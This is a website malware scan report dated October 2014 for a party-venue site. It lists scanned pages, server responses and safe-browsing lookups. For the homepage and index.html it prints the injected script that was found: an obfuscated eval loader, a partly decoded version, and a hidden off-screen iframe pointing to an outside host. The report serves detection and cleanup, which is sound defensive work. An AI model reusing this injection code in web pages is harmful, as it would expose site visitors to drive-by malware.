Scanned pages/files
Request | Server response | Status |
http://www.westernpartytown.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:34 GMT Location: http://westernpartytown.com/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://westernpartytown.com/ | 200 OK Content-Length: 16635 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\ Decoded script: var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1 <iframe width="112" height="165" frameborder="0" style="position:absolute;left:-284px;top:-209px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe> Antivirus reports:
| ||
http://sm6.sitemeter.com/js/counter.js?site=sm6westpartytown | HTTP/1.1 302 Redirect Date: Sat, 04 Oct 2014 20:05:37 GMT Location: http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown Server: Microsoft-IIS/6.0 Content-Length: 184 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown | 200 OK Content-Length: 7567 Content-Type: application/x-javascript | clean |
http://www.westernpartytown.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:36 GMT Location: http://westernpartytown.com/index.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://westernpartytown.com/index.html | 200 OK Content-Length: 16645 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\ Decoded script: var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1 <iframe width="185" height="145" frameborder="0" style="position:absolute;left:-251px;top:-225px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe> Antivirus reports:
| ||
http://westernpartytown.com/directions.html | 200 OK Content-Length: 9484 Content-Type: text/html | clean |
http://westernpartytown.com/contact.html | 200 OK Content-Length: 11503 Content-Type: text/html | clean |
http://westernpartytown.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://www.westernpartytown.com/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:39 GMT Location: http://westernpartytown.com/contact.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.westernpartytown.com/directions.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:40 GMT Location: http://westernpartytown.com/directions.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: westernpartytown.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
GET / HTTP/1.1
Host: westernpartytown.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
Second query (visit from search engine):
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=westernpartytown.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://westernpartytown.com/
Result: westernpartytown.com is not infected or malware details are not published yet.
Result: westernpartytown.com is not infected or malware details are not published yet.